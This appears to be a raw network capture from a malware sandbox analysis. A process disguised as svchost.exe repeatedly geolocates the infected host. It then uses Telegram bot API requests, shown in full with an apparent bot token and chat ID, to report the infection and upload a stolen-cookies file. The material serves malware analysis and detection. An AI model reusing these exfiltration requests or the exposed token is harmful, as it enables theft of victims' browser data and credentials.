                                      2024-07-25 01:34:43 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49716 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:44 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:44 UTC | 702 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:44 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 7
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9blncUuwyRCgtBuxt8H39pE9%2B8l%2FskZkiZIRsXAxv5HUuvpy9%2FZ5Mqo0kuidR17qPx1wqwRSRRIRxEG4mkBOlNvrP7rNM7C1nqf8aVJ2rxFxqdilmgugQ3A87r6p3qOBkVfBU0o"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868c9cf8a8cca-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:44 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49718 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:45 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:46 UTC | 702 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:46 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 9
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMi8CQfA5og0x%2Bd0HMFCWp2rkoSeUWn6%2Fq7KBNVYGl1DpGql6Id%2FHmyflBxPX1smYq7pHlW0VIXs5IQXnLxhmrVoccz5ABSO9xucXSlHLzd3NNh0KU3nR5eBTax35ofxTqLXn3Qo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868d1f8950f9d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:46 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:47 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:47 UTC | 709 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:47 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 10
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tX%2FWkON1K1sZKYVStx%2B0J0XSCH%2BLwxwDtSDXeRJOdipJyDtB5lcUG%2FADxNHR4%2Fmq2%2FgGG5t9ehmhkSCyHv6svRJOUK6WmtnzmlhcJ7Pvwpe83arDH7DMxz7kj84flatx2L3I4Pu8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868d9ed140f46-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:47 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49721 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:48 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:48 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:34:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:34:48 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49724 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:51 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:51 UTC | 701 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:51 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 14
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kArVHq10LSjS8Wyj9GCCLsq1K4ipmO6MV%2FETXkTHWf4xL7eEXSURwb6isVAXixcnI8z8ci8XwQ8utcCeAAC3x6Mp3VG8vtqyHreybjEbY0xxPAe90Y44guN%2BoLBYH3heDly3lsEP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868f41d906a4f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:51 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:52 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:53 UTC | 705 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:53 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 16
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BEaLcZ91Iar5XZ0hAZ8ya81ioyvM4Kv%2Bp4gfC4OwmmwfTXQr4i8TpytcY21QjtFJsivip0ToJazGKYf%2B78VFJmkHtO38WsdKkfJxAtyhoViAOanHxVPFx3n1daUVSluT7YY%2FNey"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868fdadca333c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:53 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549735149.154.167.2204435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:35:03 UTC376OUTPOST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038
                                      Host: api.telegram.org
                                      Content-Length: 1257
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:03 UTC1257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 30 65 39 64 39 66 30 30 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20
                                      Data Ascii: --------------------------8dcad0e9d9f0038Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:124406Date and Time: 24/07/2024
                                      2024-07-25 01:35:04 UTC | 388 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 546
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:04 UTC | 546 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 37 31 33 30 34 2c 22 64 6f
                                      Data Ascii: {"ok":true,"result":{"message_id":1651,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1721871304,"do


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      13 | 192.168.2.5 | 49737 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:25 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:35:25 UTC | 701 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:25 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 48
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Kxv%2Fhd54YOfymWeTes2ZHy6pR02LedpaKLA8cb3ULQnS6NznWbXnbT8CGgbEqeHzhRp4WcjuLG2NaijWwmkaG7ZsxsWph12FoQOeeJBRydZh%2BPWJN7HA52AcAA6aD6QqLmSBCBX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869c98f8b0f4d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:25 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      14 | 192.168.2.5 | 49739 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:26 UTC | 709 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:26 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 49
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQuUk6C4vxGhOTWsQMhiHGlZxqYu1aKTTEEcQWUxnfxqcUZVyl9ht3%2FvJ2ijCpLmlSA%2BZ%2BfeOY9%2Fi4DEX%2BRgvEe6O1xdUamo8SlSOlxqaJSqdWSqqDrjHo2lcBrZs%2BAOZYoIJ1nI"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869d15a51c3eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:26 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.2.5 | 49741 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:28 UTC | 707 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:28 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 51
